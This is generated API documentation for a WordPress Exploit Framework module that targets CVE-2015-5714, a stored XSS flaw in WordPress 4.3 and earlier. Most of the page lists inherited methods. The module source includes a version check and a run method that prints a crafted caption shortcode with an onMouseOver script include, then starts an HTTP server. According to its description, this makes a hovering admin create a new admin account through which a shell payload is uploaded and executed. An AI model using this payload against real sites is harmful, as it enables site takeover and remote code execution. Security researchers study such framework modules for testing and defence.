Class: Wpxf::Exploit::Wp43ShortcodeXssShellUpload

Inherits:
Module
  • Object
show all
Includes:
Wpxf, WordPress::Xss
Defined in:
lib/wpxf/modules/exploit/xss/stored/wp_v4.3_shortcode_xss_shell_upload.rb

Constant Summary

Constants included from WordPress::Options

WordPress::Options::WP_OPTION_CONTENT_DIR

Constants included from Net::HttpOptions

Net::HttpOptions::HTTP_OPTION_BASIC_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_CLIENT_TIMEOUT, Net::HttpOptions::HTTP_OPTION_FOLLOW_REDIRECT, Net::HttpOptions::HTTP_OPTION_HOST, Net::HttpOptions::HTTP_OPTION_HOST_VERIFICATION, Net::HttpOptions::HTTP_OPTION_MAX_CONCURRENCY, Net::HttpOptions::HTTP_OPTION_PEER_VERIFICATION, Net::HttpOptions::HTTP_OPTION_PORT, Net::HttpOptions::HTTP_OPTION_PROXY, Net::HttpOptions::HTTP_OPTION_PROXY_AUTH_CREDS, Net::HttpOptions::HTTP_OPTION_SSL, Net::HttpOptions::HTTP_OPTION_TARGET_URI, Net::HttpOptions::HTTP_OPTION_USER_AGENT, Net::HttpOptions::HTTP_OPTION_VHOST

Instance Attribute Summary

Attributes inherited from Module

#active_workspace, #event_emitter, #payload, #session_cookie

Attributes included from Options

#datastore, #options

Instance Method Summary collapse

Methods included from WordPress::Xss

#on_http_request, #upload_shell, #wordpress_js_create_user, #xss_ascii_encoded_include_script, #xss_host, #xss_include_script, #xss_path, #xss_shell_success, #xss_url, #xss_url_and_ascii_encoded_include_script

Methods included from WordPress::Plugin

#fetch_plugin_upload_nonce, #generate_wordpress_plugin_header, #upload_payload_as_plugin, #upload_payload_as_plugin_and_execute, #upload_payload_using_plugin_form

Methods included from Net::HttpServer

#http_server_bind_address, #http_server_bind_port, #http_server_thread, #js_ajax_download, #js_ajax_post, #js_post, #on_http_request, #start_http_server, #stop_http_server

Methods included from Wpxf

app_path, build_module_list, change_stdout_sync, custom_modules_path, data_directory, databases_path, gemspec, home_directory, load_custom_modules, load_module, modules_path, payloads_path, version

Methods inherited from Module

#aux_module?, #can_execute?, #check_wordpress_and_online, #cleanup, #exploit_module?, #missing_options, #set_option_value, #unset_option

Methods included from Db::Credentials

#store_credentials

Methods included from ModuleAuthentication

#authenticate_with_wordpress, #requires_authentication

Methods included from WordPress::Urls

#wordpress_url_admin, #wordpress_url_admin_ajax, #wordpress_url_admin_options, #wordpress_url_admin_post, #wordpress_url_admin_profile, #wordpress_url_admin_update, #wordpress_url_atom, #wordpress_url_author, #wordpress_url_comments_post, #wordpress_url_login, #wordpress_url_new_user, #wordpress_url_opml, #wordpress_url_plugin_install, #wordpress_url_plugin_upload, #wordpress_url_plugins, #wordpress_url_post, #wordpress_url_rdf, #wordpress_url_readme, #wordpress_url_rest_api, #wordpress_url_rss, #wordpress_url_sitemap, #wordpress_url_themes, #wordpress_url_uploads, #wordpress_url_wp_content, #wordpress_url_xmlrpc

Methods included from WordPress::Options

#wp_content_dir

Methods included from WordPress::Login

#valid_wordpress_cookie?, #wordpress_login, #wordpress_login_post_body

Methods included from WordPress::Fingerprint

#check_plugin_version_from_changelog, #check_plugin_version_from_readme, #check_theme_version_from_readme, #check_theme_version_from_style, #check_version_from_custom_file, #wordpress_and_online?, #wordpress_version

Methods included from Net::HttpClient

#base_http_headers, #base_uri, #download_file, #execute_delete_request, #execute_get_request, #execute_post_request, #execute_put_request, #execute_queued_requests, #execute_request, #full_uri, #initialize_advanced_options, #initialize_options, #max_http_concurrency, #normalize_relative_uri, #normalize_uri, #queue_request, #target_host, #target_port, #target_uri

Methods included from Net::TyphoeusHelper

#advanced_typhoeus_options, #create_typhoeus_request, #create_typhoeus_request_options, #standard_typhoeus_options

Methods included from Net::UserAgent

#clients_by_frequency, #random_browser_and_os, #random_chrome_platform_string, #random_firefox_platform_string, #random_firefox_version_string, #random_iexplorer_platform_string, #random_opera_platform_string, #random_processor_string, #random_safari_platform_string, #random_time_string, #random_user_agent

Methods included from Versioning::OSVersions

#random_nt_version, #random_osx_version

Methods included from Versioning::BrowserVersions

#random_chrome_build_number, #random_chrome_version, #random_ie_version, #random_opera_version, #random_presto_version, #random_presto_version2, #random_safari_build_number, #random_safari_version, #random_trident_version

Methods included from Options

#all_options_valid?, #get_option, #get_option_value, #missing_options, #normalized_option_value, #option_valid?, #option_value?, #register_advanced_options, #register_evasion_options, #register_option, #register_options, #scoped_option_change, #set_option_value, #unregister_option, #unset_option

Methods included from OutputEmitters

#emit_error, #emit_info, #emit_success, #emit_table, #emit_warning

Methods included from ModuleInfo

#emit_usage_info, #module_author, #module_date, #module_desc, #module_description_preformatted, #module_name, #module_references, #update_info

Constructor Details

#initializeWp43ShortcodeXssShellUpload

Returns a new instance of Wp43ShortcodeXssShellUpload.



7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
 
# File 'lib/wpxf/modules/exploit/xss/stored/wp_v4.3_shortcode_xss_shell_upload.rb', line 7

def initialize
  super

  update_info(
    name: 'WordPress <= 4.3 Shortcode Stored XSS Shell Upload',
    desc: 'In version 4.3 and below of WordPress, a stored XSS '\
          'vulnerability exists that allows a user to store a script if '\
          'they have the required permissions to publish a new post.'\
          "\n"\
          'This module prepares a shortcode that can be included in a post '\
          'which when hovered over by an admin user will create '\
          'a new admin user which will be used to upload and execute the '\
          'selected payload in the context of the web server.',
    author: [
      'Shahar Tal',    # Discovery and disclosure
      'Netanel Rubin', # Discovery and disclosure
      'rastating'      # WPXF module
    ],
    references: [
      ['CVE', '2015-5714'],
      ['WPVDB', '8186'],
      ['URL', 'https://wordpress.org/news/2015/09/wordpress-4-3-1/']
    ],
    date: 'Sept 15 2015'
  )
end

Instance Method Details

#checkObject 



34
35
36
37
38
39
 
# File 'lib/wpxf/modules/exploit/xss/stored/wp_v4.3_shortcode_xss_shell_upload.rb', line 34

def check
  version = wordpress_version
  return :unknown if version.nil?
  return :vulnerable if version < Gem::Version.new('4.3.1')
  :safe
end

#runObject 



41
42
43
44
45
46
47
48
49
50
51
52
53
54
 
# File 'lib/wpxf/modules/exploit/xss/stored/wp_v4.3_shortcode_xss_shell_upload.rb', line 41

def run
  return false unless super

  @success = false
  emit_info 'Create a new post with the below shorttag included:'
  puts
  puts "[caption width=\"1\" caption='<a href=\"' \">]</a><a href=\""\
       "http://onMouseOver='#{xss_ascii_encoded_include_script}'"\
       '">Click Me</a>'
  puts

  start_http_server
  @success
end